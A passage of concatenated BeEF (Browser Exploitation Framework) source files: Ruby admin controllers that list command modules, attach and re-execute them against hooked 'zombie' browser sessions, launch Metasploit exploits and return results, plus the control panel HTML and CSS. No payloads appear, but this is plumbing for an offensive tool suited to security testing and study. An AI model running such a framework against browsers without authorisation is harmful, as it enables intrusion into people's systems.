parent
end
end
# Recursive function to sort all the parent's children
def sort_recursive_tree(parent)
# sort the children nodes by status and name
parent.each do |x|
# print_info "Sorting: " + x['children'].to_s
next unless x.is_a?(Hash) && x.has_key?('children')
x['children'] = x['children'].sort_by do |a|
fldr = a['cls'] || 'zzzzz'
"#{fldr}#{a['status']}#{a['text']}"
end
x['children'].each do |c|
sort_recursive_tree([c]) if c.has_key?('cls') && c['cls'] == 'folder'
end
end
end
# Recursive function to retitle folders with the number of children
def retitle_recursive_tree(parent)
# append the number of command modules so the branch name results in: "<category name> (num)"
parent.each do |command_module_branch|
next unless command_module_branch.is_a?(Hash) && command_module_branch.has_key?('children')
num_of_subs = 0
command_module_branch['children'].each do |c|
# add in the submodules and subtract 1 for the folder node
num_of_subs += c['children'].length - 1 if c.has_key?('children')
retitle_recursive_tree([c]) if c.has_key?('cls') && c['cls'] == 'folder'
end
num_of_command_modules = command_module_branch['children'].length + num_of_subs
command_module_branch['text'] = command_module_branch['text'] + ' (' + num_of_command_modules.to_s + ')'
end
end
# Returns the list of all command_modules for a TreePanel in the interface.
def select_command_modules_tree
blanktree = []
tree = []
# Due to the sub-folder nesting, we use some really badly hacked together recursion
# Note to the bored - if someone (anyone please) wants to refactor, I'll buy you cookies. -x
tree = build_recursive_tree(blanktree, BeEF::Modules.get_categories)
BeEF::Modules.get_enabled.each do |k, mod|
# get the hooked browser session id and set it in the command module
hook_session_id = @params['zombie_session'] || nil
if hook_session_id.nil?
print_error 'hook_session_id is nil'
return
end
# create url path and file for the command module icon
command_module_status = set_command_module_status(k)
command_module_icon_path = set_command_module_icon(command_module_status)
update_command_module_tree(tree, mod['category'], command_module_icon_path, command_module_status, mod['name'], mod['db']['id'])
end
# if dynamic modules are found in the DB, then we don't have yaml config for them
# and loading must proceed in a different way.
dynamic_modules = BeEF::Core::Models::CommandModule.where('path LIKE ?', 'Dynamic/')
unless dynamic_modules.nil?
all_modules = BeEF::Core::Models::CommandModule.all.order(:id)
all_modules.each do |dyn_mod|
next unless dyn_mod.path.split('/')[1].match(/^metasploit/)
command_mod_name = dyn_mod['name']
dyn_mod_category = 'Metasploit'
command_module_status = set_command_module_status(command_mod_name)
command_module_icon_path = set_command_module_icon(command_module_status)
update_command_module_tree(tree, dyn_mod_category, command_module_icon_path, command_module_status, command_mod_name, dyn_mod.id)
end
end
# sort the parent array nodes
tree.sort! { |a, b| a['text'] <=> b['text'] }
sort_recursive_tree(tree)
retitle_recursive_tree(tree)
# return a JSON array of hashes
@body = tree.to_json
end
# Returns the inputs definition of an command_module.
def select_command_module
command_module_id = @params['command_module_id'] || nil
if command_module_id.nil?
print_error 'command_module_id is nil'
return
end
command_module = BeEF::Core::Models::CommandModule.find(command_module_id)
key = BeEF::Module.get_key_by_database_id(command_module_id)
payload_name = @params['payload_name'] || nil
@body = if payload_name.nil?
command_modules2json([key])
else
dynamic_payload2json(command_module_id, payload_name)
end
end
# Returns the list of commands for an command_module
def select_command_module_commands
commands = []
i = 0
# get params
zombie_session = @params['zombie_session'] || nil
if zombie_session.nil?
print_error 'Zombie session is nil'
return
end
command_module_id = @params['command_module_id'] || nil
if command_module_id.nil?
print_error 'command_module id is nil'
return
end
# validate nonce
nonce = @params['nonce'] || nil
if nonce.nil?
print_error 'nonce is nil'
return
end
if @session.get_nonce != nonce
print_error 'nonce incorrect'
return
end
# get the browser id
zombie = Z.where(session: zombie_session).first
if zombie.nil?
print_error 'Zombie is nil'
return
end
zombie_id = zombie.id
if zombie_id.nil?
print_error 'Zombie id is nil'
return
end
C.where(command_module_id: command_module_id, hooked_browser_id: zombie_id).each do |command|
commands.push({
'id' => i,
'object_id' => command.id,
'creationdate' => Time.at(command.creationdate.to_i).strftime('%Y-%m-%d %H:%M').to_s,
'label' => command.label
})
i += 1
end
@body = {
'success' => 'true',
'commands' => commands
}.to_json
end
# Attaches an command_module to a zombie.
def attach_command_module
definition = {}
# get params
zombie_session = @params['zombie_session'] || nil
if zombie_session.nil?
print_error 'Zombie id is nil'
return
end
command_module_id = @params['command_module_id'] || nil
if command_module_id.nil?
print_error 'command_module id is nil'
return
end
# validate nonce
nonce = @params['nonce'] || nil
if nonce.nil?
print_error 'nonce is nil'
return
end
if @session.get_nonce != nonce
print_error 'nonce incorrect'
return
end
@params.keys.each do |param|
unless BeEF::Filters.has_valid_param_chars?(param)
print_error 'invalid key param string'
return
end
if BeEF::Filters.first_char_is_num?(param)
print_error 'first char is num'
return
end
definition[param[4..-1]] = params[param]
oc = BeEF::Core::Models::OptionCache.first_or_create(name: param[4..-1])
oc.value = params[param]
oc.save
end
mod_key = BeEF::Module.get_key_by_database_id(command_module_id)
# Hack to rework the old option system into the new option system
def2 = []
definition.each do |k, v|
def2.push({ 'name' => k, 'value' => v })
end
# End hack
exec_results = BeEF::Module.execute(mod_key, zombie_session, def2)
@body = exec_results.nil? ? '{success: false}' : '{success: true}'
end
# Re-execute an command_module to a zombie.
def reexecute_command_module
# get params
command_id = @params['command_id'] || nil
if command_id.nil?
print_error 'Command id is nil'
return
end
command = BeEF::Core::Models::Command.find(command_id.to_i) || nil
if command.nil?
print_error 'Command is nil'
return
end
# validate nonce
nonce = @params['nonce'] || nil
if nonce.nil?
print_error 'nonce is nil'
return
end
if @session.get_nonce != nonce
print_error 'nonce incorrect'
return
end
command.instructions_sent = false
command.save
@body = '{success : true}'
end
def attach_dynamic_command_module
definition = {}
# get params
zombie_session = @params['zombie_session'] || nil
if zombie_session.nil?
print_error 'Zombie id is nil'
return
end
command_module_id = @params['command_module_id'] || nil
if command_module_id.nil?
print_error 'command_module id is nil'
return
end
# validate nonce
nonce = @params['nonce'] || nil
if nonce.nil?
print_error 'nonce is nil'
return
end
if @session.get_nonce != nonce
print_error 'nonce incorrect'
return
end
@params.keys.each do |param|
unless BeEF::Filters.has_valid_param_chars?(param)
print_error 'invalid key param string'
return
end
if BeEF::Filters.first_char_is_num?(param)
print_error "first char is num: #{param}"
return
end
definition[param[4..-1]] = params[param]
oc = BeEF::Core::Models::OptionCache.first_or_create(name: param[4..-1])
oc.value = params[param]
oc.save
end
zombie = Z.where(session: zombie_session).first
if zombie.nil?
print_error 'Zombie is nil'
return
end
zombie_id = zombie.id
if zombie_id.nil?
print_error 'Zombie id is nil'
return
end
command_module = BeEF::Core::Models::CommandModule.find(command_module_id)
return { 'success' => 'false' }.to_json if command_module.nil?
unless command_module.path.match(/^Dynamic/)
print_info "Command module path is not dynamic: #{command_module.path}"
return { 'success' => 'false' }.to_json
end
dyn_mod_name = command_module.path.split('/').last
e = BeEF::Modules::Commands.const_get(dyn_mod_name.capitalize).new
e.update_info(command_module_id)
e.update_data
ret = e.launch_exploit(definition)
if ret['result'] != 'success'
print_info 'mount failed'
return { 'success' => 'false' }.to_json
end
basedef = {}
basedef['sploit_url'] = ret['uri']
C.new(
data: basedef.to_json,
hooked_browser_id: zombie_id,
command_module_id: command_module_id,
creationdate: Time.new.to_i
).save
@body = { 'success' => true }.to_json
end
# Returns the results of a command
def select_command_results
results = []
# get params
command_id = @params['command_id'] || nil
if command_id.nil?
print_error 'Command id is nil'
return
end
command = BeEF::Core::Models::Command.find(command_id.to_i) || nil
if command.nil?
print_error 'Command is nil'
return
end
# get command_module
command_module = BeEF::Core::Models::CommandModule.find(command.command_module_id)
if command_module.nil?
print_error 'command_module is nil'
return
end
resultsdb = BeEF::Core::Models::Result.where(command_id: command_id)
if resultsdb.nil?
print_error 'Command id result is nil'
return
end
resultsdb.each { |result| results.push({ 'date' => result.date, 'data' => JSON.parse(result.data) }) }
@body = {
'success' => 'true',
'command_module_name' => command_module.name,
'command_module_id' => command_module.id,
'results' => results
}.to_json
end
# Returns the definition of a command.
# In other words it returns the command that was used to command_module a zombie.
def select_command
# get params
command_id = @params['command_id'] || nil
if command_id.nil?
print_error 'Command id is nil'
return
end
command = BeEF::Core::Models::Command.find(command_id.to_i) || nil
if command.nil?
print_error 'Command is nil'
return
end
command_module = BeEF::Core::Models::CommandModule.find(command.command_module_id)
if command_module.nil?
print_error 'command_module is nil'
return
end
if command_module.path.split('/').first.match(/^Dynamic/)
dyn_mod_name = command_module.path.split('/').last
e = BeEF::Modules::Commands.const_get(dyn_mod_name.capitalize).new
else
command_module_name = command_module.name
e = BeEF::Core::Command.const_get(command_module_name.capitalize).new(command_module_name)
end
@body = {
'success' => 'true',
'command_module_name' => command_module_name,
'command_module_id' => command_module.id,
'data' => BeEF::Module.get_options(command_module_name),
'definition' => JSON.parse(e.to_json)
}.to_json
end
private
# Takes a list of command_modules and returns them as a JSON array
def command_modules2json(command_modules)
command_modules_json = {}
i = 1
config = BeEF::Core::Configuration.instance
command_modules.each do |command_module|
h = {
'Name' => config.get("beef.module.#{command_module}.name"),
'Description' => config.get("beef.module.#{command_module}.description"),
'Category' => config.get("beef.module.#{command_module}.category"),
'Data' => BeEF::Module.get_options(command_module)
}
command_modules_json[i] = h
i += 1
end
return { 'success' => 'false' }.to_json if command_modules_json.empty?
{ 'success' => 'true', 'command_modules' => command_modules_json }.to_json
end
# return the input requred for the module in JSON format
def dynamic_modules2json(id)
command_modules_json = {}
mod = BeEF::Core::Models::CommandModule.find(id)
# if the module id is not in the database return false
return { 'success' => 'false' }.to_json unless mod
# the path will equal Dynamic/<type> and this will get just the type
dynamic_type = mod.path.split('/').last
e = BeEF::Modules::Commands.const_get(dynamic_type.capitalize).new
e.update_info(mod.id)
e.update_data
command_modules_json[1] = JSON.parse(e.to_json)
if command_modules_json.empty?
{ 'success' => 'false' }.to_json
else
{ 'success' => 'true', 'dynamic' => 'true', 'command_modules' => command_modules_json }.to_json
end
end
def dynamic_payload2json(id, payload_name)
command_module = BeEF::Core::Models::CommandModule.find(id)
if command_module.nil?
print_error 'Module does not exists'
return { 'success' => 'false' }.to_json
end
payload_options = BeEF::Module.get_payload_options(command_module.name, payload_name)
# get payload options in JSON
# e = BeEF::Modules::Commands.const_get(dynamic_type.capitalize).new
payload_options_json = []
payload_options_json[1] = payload_options
# payload_options_json[1] = e.get_payload_options(payload_name)
{ 'success' => 'true', 'command_modules' => payload_options_json }.to_json
end
end
end
end
end
end |
HTML | beef/extensions/admin_ui/controllers/panel/index.html | <!--
Copyright (c) 2006-2023 Wade Alcorn - [email protected]
Browser Exploitation Framework (BeEF) - http://beefproject.com
See the file 'doc/COPYING' for copying permission
-->
<html>
<head>
<title>BeEF Control Panel</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
<%= script_tag 'ext-base.js' %>
<%= script_tag 'ext-all.js' %>
<%= script_tag_min 'web_ui_all.js' %>
<%= script_tag 'vis.js/vis.min.js' %>
<%= stylesheet_tag 'ext-all.css' %>
<%= stylesheet_tag 'base.css' %>
</head>
<body>
<%= nonce_tag %>
<div id="header">
<div class="left-menu" id="header-right">
</div>
<div class="right-menu">
<img src="<%= base_path %>/media/images/favicon.png" />
BeEF <%= BeEF::Core::Configuration.instance.get('beef.version') %> |
<a id='do-logout-menu' href='#'>Logout</a>
</div>
</div>
</body>
</html> |
Ruby | beef/extensions/admin_ui/controllers/panel/panel.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - [email protected]
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Extension
module AdminUI
module Controllers
class Panel < BeEF::Extension::AdminUI::HttpController
def initialize
super({
'paths' => {
'/' => method(:index)
}
})
end
# default index page
def index
@headers['X-Frame-Options'] = 'sameorigin'
end
end
end
end
end
end |
Ruby | beef/extensions/admin_ui/handlers/ui.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - [email protected]
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
#
# Generic Http Handler that extensions can use to register http
# controllers into the framework.
#
module BeEF
module Extension
module AdminUI
module Handlers
class UI
#
# Constructor
#
def initialize(klass)
@klass = BeEF::Extension::AdminUI::Controllers.const_get(klass.to_s.capitalize)
end
def call(env)
@request = Rack::Request.new(env)
@response = Rack::Response.new(env)
controller = @klass.new
controller.run(@request, @response)
@response = Rack::Response.new(
body = [controller.body],
status = controller.status,
header = controller.headers
)
end
@request
@response
end
end
end
end
end |
beef/extensions/admin_ui/media/css/base.css | /*
* Copyright (c) 2006-2023 Wade Alcorn - [email protected]
* Browser Exploitation Framework (BeEF) - http://beefproject.com
* See the file 'doc/COPYING' for copying permission
*/
#header .right-menu {
width: 300px;
float: right;
margin: 3px 3px 0 4px;
word-spacing: 5px;
font: 11px arial, tahoma, verdana, helvetica;
color:#000;
}
#header .left-menu {
width: 300px;
float: left;
margin: 10px 4px 0 20px;
word-spacing: 5px;
font: 11px arial, tahoma, verdana, helvetica;
font-weight: bolder;
color:red;
}
#header a:link,
#header a:visited {
color:#000;
text-decoration:underline;
}
.x-grid3-cell-inner {
white-space: normal; /* changed from nowrap */
}
.x-grid-empty {
text-align:left;
}
.feed-icon {
display: none;
}
#zombie-tree-tabs-panel .x-tab-panel-header {
font: 11px tahoma,arial,helvetica,sans-serif;
padding: 0 0 0 0;
border-bottom: none;
text-align: center;
}
/*
* Status bar
****************************************/
.x-statusbar .x-status-busy,
.x-statusbar .x-status-error,
.x-statusbar .x-status-valid {
background: transparent no-repeat 3px 2px;
padding-left: 25px !important;
padding-bottom: 2px !important;
}
.x-statusbar .x-status-busy {
background-image: url(../images/statusbar/loading.gif);
}
.x-statusbar .x-status-error {
color: #C33;
background-image: url(../images/statusbar/exclamation.gif);
}
.x-statusbar .x-status-valid {
background-image: url(../images/statusbar/accept.png);
}
/*
* Zombie Tree
****************************************/
.x-tree-node-leaf .x-tree-node-icon {
width: 13px;
height: 13px;
padding-left: 3px;
padding-top: 3px;
}
/*
* Zombie Tree Icons
****************************************/
.zombie-tree-icon {
padding-left: 3px;
padding-top: 3px;
width: 13px;
height: 13px;
border: 0;
}
/* these aren't used at the moment, but should be used rather than img tags */
.zombie-tree-icon-browser-ff {
background-image: url(../images/icons/firefox.png) no-repeat;
}
.zombie-tree-icon-browser-ie {
background-image: url(../images/icons/msie.png) no-repeat;
}
.zombie-tree-icon-browser-e {
background-image: url(../images/icons/edge.png) no-repeat;
}
.zombie-tree-icon-browser-ep {
background-image: url(../images/icons/epiphany.png) no-repeat;
}
.zombie-tree-icon-browser-s {
background-image: url(../images/icons/safari.png) no-repeat;
}
.zombie-tree-icon-browser-c {
background-image: url(../images/icons/chrome.png) no-repeat;
}
.zombie-tree-icon-browser-o {
background-image: url(../images/icons/opera.ico) no-repeat;
}
.zombie-tree-icon-browser-mi {
background-image: url(../images/icons/midori.png) no-repeat;
}
.zombie-tree-icon-browser-od {
background-image: url(../images/icons/odyssey.png) no-repeat;
}
.zombie-tree-icon-browser-br {
background-image: url(../images/icons/brave.png) no-repeat;
}
.zombie-tree-icon-browser-unknown {
background-image: url(../images/icons/unknown.png) no-repeat;
}
/*
* Zombie Tree Context Menu
****************************************/
.zombie-tree-ctxMenu-proxy {
background-image: url(../images/icons/proxy.gif);
}
.zombie-tree-ctxMenu-xssrays {
background-image: url(../images/icons/xssrays.png);
}
.zombie-tree-ctxMenu-rtc {
background-image: url(../images/icons/network.png);
background-size: 24px 24px;
background-repeat: no-repeat;
}
.zombie-tree-ctxMenu-delete {
background-image: url(../images/icons/delete.png);
background-size: 32px 32px;
background-repeat: no-repeat;
}
/*
* Network Panel
****************************************/
.network-host-ctxMenu-config {
background-image: url(../images/icons/tools.png);
background-size: 16px 16px;
background-repeat: no-repeat;
}
.network-host-ctxMenu-host {
background-image: url(../images/icons/pc.png);
background-size: 16px 16px;
background-repeat: no-repeat;
}
.network-host-ctxMenu-network {
background-image: url(../images/icons/network.png);
background-size: 16px 16px;
background-repeat: no-repeat;
}
.network-host-ctxMenu-web {
background-image: url(../images/icons/web.png);
background-size: 16px 16px;
background-repeat: no-repeat;
}
.network-host-ctxMenu-adapter {
background-image: url(../images/icons/adapter.png);
background-size: 16px 16px;
background-repeat: no-repeat;
}
.network-host-ctxMenu-router {
background-image: url(../images/icons/router.png);
background-size: 16px 16px;
background-repeat: no-repeat;
}
.network-host-ctxMenu-proxy {
background-image: url(../images/icons/proxy.png);
background-size: 16px 16px;
background-repeat: no-repeat;
}
.network-host-ctxMenu-fingerprint {
background-image: url(../images/icons/magnifier.png);
background-size: 16px 16px;
background-repeat: no-repeat;
}
.network-host-ctxMenu-cors {
background-image: url(../images/icons/cors.png);
background-size: 16px 16px;
background-repeat: no-repeat;
}
.network-host-ctxMenu-flash {
background-image: url(../images/icons/flash.png);
background-size: 16px 16px;
background-repeat: no-repeat;
}
.network-host-ctxMenu-shellshock {
background-image: url(../images/icons/shellshock.png);
background-size: 16px 16px;
background-repeat: no-repeat;
}
.network-host-ctxMenu-php {
background-image: url(../images/icons/php.png);
background-size: 16px 16px;
background-repeat: no-repeat;
}
/*
* Ext.beef.msg
****************************************/
.msg .x-box-mc {
font-size:14px;
}
#msg-div {
position:absolute;
left:35%;
top:20px;
width:250px;
z-index:20000;
}
/*
* Exploit Panel
****************************************/
.x-form-item-label, .x-form-element {
font: 11px tahoma,arial,helvetica,sans-serif;
}
.command-module-panel-description {
margin-bottom: 10px;
padding-top: 4px;
}
label {
font: 11px tahoma,arial,helvetica,sans-serif;
} |
|
beef/extensions/admin_ui/media/css/ext-all.css | /*
* Copyright (c) 2006-2023 Wade Alcorn - [email protected]
* Browser Exploitation Framework (BeEF) - http://beefproject.com
* See the file 'doc/COPYING' for copying permission
*/
/*!
* Ext JS Library 3.3.1
* Copyright(c) 2006-2010 Sencha Inc.
* [email protected]
* http://www.sencha.com/license
*/
html,body,div,dl,dt,dd,ul,ol,li,h1,h2,h3,h4,h5,h6,pre,form,fieldset,input,p,blockquote,th,td{margin:0;padding:0;}img,body,html{border:0;}address,caption,cite,code,dfn,em,strong,th,var{font-style:normal;font-weight:normal;}ol,ul {list-style:none;}caption,th {text-align:left;}h1,h2,h3,h4,h5,h6{font-size:100%;}q:before,q:after{content:'';}
.ext-forced-border-box, .ext-forced-border-box * {
-moz-box-sizing: border-box;
-ms-box-sizing: border-box;
-webkit-box-sizing: border-box;
}
.ext-el-mask {
z-index: 100;
position: absolute;
top:0;
left:0;
-moz-opacity: 0.5;
opacity: .50;
filter: alpha(opacity=50);
width: 100%;
height: 100%;
zoom: 1;
}
.ext-el-mask-msg {
z-index: 20001;
position: absolute;
top: 0;
left: 0;
border:1px solid;
background:repeat-x 0 -16px;
padding:2px;
}
.ext-el-mask-msg div {
padding:5px 10px 5px 10px;
border:1px solid;
cursor:wait;
}
.ext-shim {
position:absolute;
visibility:hidden;
left:0;
top:0;
overflow:hidden;
}
.ext-ie .ext-shim {
filter: alpha(opacity=0);
}
.ext-ie6 .ext-shim {
margin-left: 5px;
margin-top: 3px;
}
.x-mask-loading div {
padding:5px 10px 5px 25px;
background:no-repeat 5px 5px;
line-height:16px;
}
/* class for hiding elements without using display:none */
.x-hidden, .x-hide-offsets {
position:absolute !important;
left:-10000px;
top:-10000px;
visibility:hidden;
}
.x-hide-display {
display:none !important;
}
.x-hide-nosize,
.x-hide-nosize * /* Emulate display:none for children */
{
height:0px!important;
width:0px!important;
visibility:hidden!important;
border:none!important;
zoom:1;
}
.x-hide-visibility {
visibility:hidden !important;
}
.x-masked {
overflow: hidden !important;
}
.x-masked-relative {
position: relative !important;
}
.x-masked select, .x-masked object, .x-masked embed {
visibility: hidden;
}
.x-layer {
visibility: hidden;
}
.x-unselectable, .x-unselectable * {
-moz-user-select: none;
-khtml-user-select: none;
-webkit-user-select:ignore;
}
.x-repaint {
zoom: 1;
background-color: transparent;
-moz-outline: none;
outline: none;
}
.x-item-disabled {
cursor: default;
opacity: .6;
-moz-opacity: .6;
filter: alpha(opacity=60);
}
.x-item-disabled * {
cursor: default !important;
}
.x-form-radio-group .x-item-disabled {
filter: none;
}
.x-splitbar-proxy {
position: absolute;
visibility: hidden;
z-index: 20001;
zoom: 1;
line-height: 1px;
font-size: 1px;
overflow: hidden;
}
.x-splitbar-h, .x-splitbar-proxy-h {
cursor: e-resize;
cursor: col-resize;
}
.x-splitbar-v, .x-splitbar-proxy-v {
cursor: s-resize;
cursor: row-resize;
}
.x-color-palette {
width: 150px;
height: 92px;
cursor: pointer;
}
.x-color-palette a {
border: 1px solid;
float: left;
padding: 2px;
text-decoration: none;
-moz-outline: 0 none;
outline: 0 none;
cursor: pointer;
}
.x-color-palette a:hover, .x-color-palette a.x-color-palette-sel {
border: 1px solid;
}
.x-color-palette em {
display: block;
border: 1px solid;
}
.x-color-palette em span {
cursor: pointer;
display: block;
height: 10px;
line-height: 10px;
width: 10px;
}
.x-ie-shadow {
display: none;
position: absolute;
overflow: hidden;
left:0;
top:0;
zoom:1;
}
.x-shadow {
display: none;
position: absolute;
overflow: hidden;
left:0;
top:0;
}
.x-shadow * {
overflow: hidden;
}
.x-shadow * {
padding: 0;
border: 0;
margin: 0;
clear: none;
zoom: 1;
}
/* top bottom */
.x-shadow .xstc, .x-shadow .xsbc {
height: 6px;
float: left;
}
/* corners */
.x-shadow .xstl, .x-shadow .xstr, .x-shadow .xsbl, .x-shadow .xsbr {
width: 6px;
height: 6px;
float: left;
}
/* sides */
.x-shadow .xsc {
width: 100%;
}
.x-shadow .xsml, .x-shadow .xsmr {
width: 6px;
float: left;
height: 100%;
}
.x-shadow .xsmc {
float: left;
height: 100%;
background-color: transparent;
}
.x-shadow .xst, .x-shadow .xsb {
height: 6px;
overflow: hidden;
width: 100%;
}
.x-shadow .xsml {
background: transparent repeat-y 0 0;
}
.x-shadow .xsmr {
background: transparent repeat-y -6px 0;
}
.x-shadow .xstl {
background: transparent no-repeat 0 0;
}
.x-shadow .xstc {
background: transparent repeat-x 0 -30px;
}
.x-shadow .xstr {
background: transparent repeat-x 0 -18px;
}
.x-shadow .xsbl {
background: transparent no-repeat 0 -12px;
}
.x-shadow .xsbc {
background: transparent repeat-x 0 -36px;
}
.x-shadow .xsbr {
background: transparent repeat-x 0 -6px;
}
.loading-indicator {
background: no-repeat left;
padding-left: 20px;
line-height: 16px;
margin: 3px;
}
.x-text-resize {
position: absolute;
left: -1000px;
top: -1000px;
visibility: hidden;
zoom: 1;
}
.x-drag-overlay {
width: 100%;
height: 100%;
display: none;
position: absolute;
left: 0;
top: 0;
background-image:url(../images/default/s.gif);
z-index: 20000;
}
.x-clear {
clear:both;
height:0;
overflow:hidden;
line-height:0;
font-size:0;
}
.x-spotlight {
z-index: 8999;
position: absolute;
top:0;
left:0;
-moz-opacity: 0.5;
opacity: .50;
filter: alpha(opacity=50);
width:0;
height:0;
zoom: 1;
}
#x-history-frame {
position:absolute;
top:-1px;
left:0;
width:1px;
height:1px;
visibility:hidden;
}
#x-history-field {
position:absolute;
top:0;
left:-1px;
width:1px;
height:1px;
visibility:hidden;
}
.x-resizable-handle {
position:absolute;
z-index:100;
/* ie needs these */
font-size:1px;
line-height:6px;
overflow:hidden;
filter:alpha(opacity=0);
opacity:0;
zoom:1;
}
.x-resizable-handle-east{
width:6px;
cursor:e-resize;
right:0;
top:0;
height:100%;
}
.ext-ie .x-resizable-handle-east {
margin-right:-1px; /*IE rounding error*/
}
.x-resizable-handle-south{
width:100%;
cursor:s-resize;
left:0;
bottom:0;
height:6px;
}
.ext-ie .x-resizable-handle-south {
margin-bottom:-1px; /*IE rounding error*/
}
.x-resizable-handle-west{
width:6px;
cursor:w-resize;
left:0;
top:0;
height:100%;
}
.x-resizable-handle-north{
width:100%;
cursor:n-resize;
left:0;
top:0;
height:6px;
}
.x-resizable-handle-southeast{
width:6px;
cursor:se-resize;
right:0;
bottom:0;
height:6px;
z-index:101;
}
.x-resizable-handle-northwest{
width:6px;
cursor:nw-resize;
left:0;
top:0;
height:6px;
z-index:101;
}
.x-resizable-handle-northeast{
width:6px;
cursor:ne-resize;
right:0;
top:0;
height:6px;
z-index:101;
}
.x-resizable-handle-southwest{
width:6px;
cursor:sw-resize;
left:0;
bottom:0;
height:6px;
z-index:101;
}
.x-resizable-over .x-resizable-handle, .x-resizable-pinned .x-resizable-handle{
filter:alpha(opacity=100);
opacity:1;
}
.x-resizable-over .x-resizable-handle-east, .x-resizable-pinned .x-resizable-handle-east,
.x-resizable-over .x-resizable-handle-west, .x-resizable-pinned .x-resizable-handle-west
{
background-position: left;
}
.x-resizable-over .x-resizable-handle-south, .x-resizable-pinned .x-resizable-handle-south,
.x-resizable-over .x-resizable-handle-north, .x-resizable-pinned .x-resizable-handle-north
{
background-position: top;
}
.x-resizable-over .x-resizable-handle-southeast, .x-resizable-pinned .x-resizable-handle-southeast{
background-position: top left;
}
.x-resizable-over .x-resizable-handle-northwest, .x-resizable-pinned .x-resizable-handle-northwest{
background-position:bottom right;
}
.x-resizable-over .x-resizable-handle-northeast, .x-resizable-pinned .x-resizable-handle-northeast{
background-position: bottom left;
}
.x-resizable-over .x-resizable-handle-southwest, .x-resizable-pinned .x-resizable-handle-southwest{
background-position: top right;
}
.x-resizable-proxy{
border: 1px dashed;
position:absolute;
overflow:hidden;
display:none;
left:0;
top:0;
z-index:50000;
}
.x-resizable-overlay{
width:100%;
height:100%;
display:none;
position:absolute;
left:0;
top:0;
z-index:200000;
-moz-opacity: 0;
opacity:0;
filter: alpha(opacity=0);
}
.x-tab-panel {
overflow:hidden;
}
.x-tab-panel-header, .x-tab-panel-footer {
border: 1px solid;
overflow:hidden;
zoom:1;
}
.x-tab-panel-header {
border: 1px solid;
padding-bottom: 2px;
}
.x-tab-panel-footer {
border: 1px solid;
padding-top: 2px;
}
.x-tab-strip-wrap {
width:100%;
overflow:hidden;
position:relative;
zoom:1;
}
ul.x-tab-strip {
display:block;
width:5000px;
zoom:1;
}
ul.x-tab-strip-top{
padding-top: 1px;
background: repeat-x bottom;
border-bottom: 1px solid;
}
ul.x-tab-strip-bottom{
padding-bottom: 1px;
background: repeat-x top;
border-top: 1px solid;
border-bottom: 0 none;
}
.x-tab-panel-header-plain .x-tab-strip-top {
background:transparent !important;
padding-top:0 !important;
}
.x-tab-panel-header-plain {
background:transparent !important;
border-width:0 !important;
padding-bottom:0 !important;
}
.x-tab-panel-header-plain .x-tab-strip-spacer,
.x-tab-panel-footer-plain .x-tab-strip-spacer {
border:1px solid;
height:2px;
font-size:1px;
line-height:1px;
}
.x-tab-panel-header-plain .x-tab-strip-spacer {
border-top: 0 none;
}
.x-tab-panel-footer-plain .x-tab-strip-spacer {
border-bottom: 0 none;
}
.x-tab-panel-footer-plain .x-tab-strip-bottom {
background:transparent !important;
padding-bottom:0 !important;
}
.x-tab-panel-footer-plain {
background:transparent !important;
border-width:0 !important;
padding-top:0 !important;
}
.ext-border-box .x-tab-panel-header-plain .x-tab-strip-spacer,
.ext-border-box .x-tab-panel-footer-plain .x-tab-strip-spacer {
height:3px;
}
ul.x-tab-strip li {
float:left;
margin-left:2px;
}
ul.x-tab-strip li.x-tab-edge {
float:left;
margin:0 !important;
padding:0 !important;
border:0 none !important;
font-size:1px !important;
line-height:1px !important;
overflow:hidden;
zoom:1;
background:transparent !important;
width:1px;
}
.x-tab-strip a, .x-tab-strip span, .x-tab-strip em {
display:block;
}
.x-tab-strip a {
text-decoration:none !important;
-moz-outline: none;
outline: none;
cursor:pointer;
}
.x-tab-strip-inner {
overflow:hidden;
text-overflow: ellipsis;
}
.x-tab-strip span.x-tab-strip-text {
white-space: nowrap;
cursor:pointer;
padding:4px 0;
}
.x-tab-strip-top .x-tab-with-icon .x-tab-right {
padding-left:6px;
}
.x-tab-strip .x-tab-with-icon span.x-tab-strip-text {
padding-left:20px;
background-position: 0 3px;
background-repeat: no-repeat;
}
.x-tab-strip-active, .x-tab-strip-active a.x-tab-right {
cursor:default;
}
.x-tab-strip-active span.x-tab-strip-text {
cursor:default;
}
.x-tab-strip-disabled .x-tabs-text {
cursor:default;
}
.x-tab-panel-body {
overflow:hidden;
}
.x-tab-panel-bwrap {
overflow:hidden;
}
.ext-ie .x-tab-strip .x-tab-right {
position:relative;
}
.x-tab-strip-top .x-tab-strip-active .x-tab-right {
margin-bottom:-1px;
}
/*
* Horrible hack for IE8 in quirks mode
*/
.ext-ie8 .x-tab-strip li {
position: relative;
}
.ext-border-box .ext-ie8 .x-tab-strip-top .x-tab-right {
top: 1px;
}
.ext-ie8 .x-tab-strip-top {
padding-top: 1;
}
.ext-border-box .ext-ie8 .x-tab-strip-top {
padding-top: 0;
}
.ext-ie8 .x-tab-strip .x-tab-strip-closable a.x-tab-strip-close {
top:3px;
}
.ext-border-box .ext-ie8 .x-tab-strip .x-tab-strip-closable a.x-tab-strip-close {
top:4px;
}
.ext-ie8 .x-tab-strip-bottom .x-tab-right{
top:0;
}
.x-tab-strip-top .x-tab-strip-active .x-tab-right span.x-tab-strip-text {
padding-bottom:5px;
}
.x-tab-strip-bottom .x-tab-strip-active .x-tab-right {
margin-top:-1px;
}
.x-tab-strip-bottom .x-tab-strip-active .x-tab-right span.x-tab-strip-text {
padding-top:5px;
}
.x-tab-strip-top .x-tab-right {
background: transparent no-repeat 0 -51px;
padding-left:10px;
}
.x-tab-strip-top .x-tab-left {
background: transparent no-repeat right -351px;
padding-right:10px;
}
.x-tab-strip-top .x-tab-strip-inner {
background: transparent repeat-x 0 -201px;
}
.x-tab-strip-top .x-tab-strip-over .x-tab-right {
background-position:0 -101px;
}
.x-tab-strip-top .x-tab-strip-over .x-tab-left {
background-position:right -401px;
}
.x-tab-strip-top .x-tab-strip-over .x-tab-strip-inner {
background-position:0 -251px;
}
.x-tab-strip-top .x-tab-strip-active .x-tab-right {
background-position: 0 0;
}
.x-tab-strip-top .x-tab-strip-active .x-tab-left {
background-position: right -301px;
}
.x-tab-strip-top .x-tab-strip-active .x-tab-strip-inner {
background-position: 0 -151px;
}
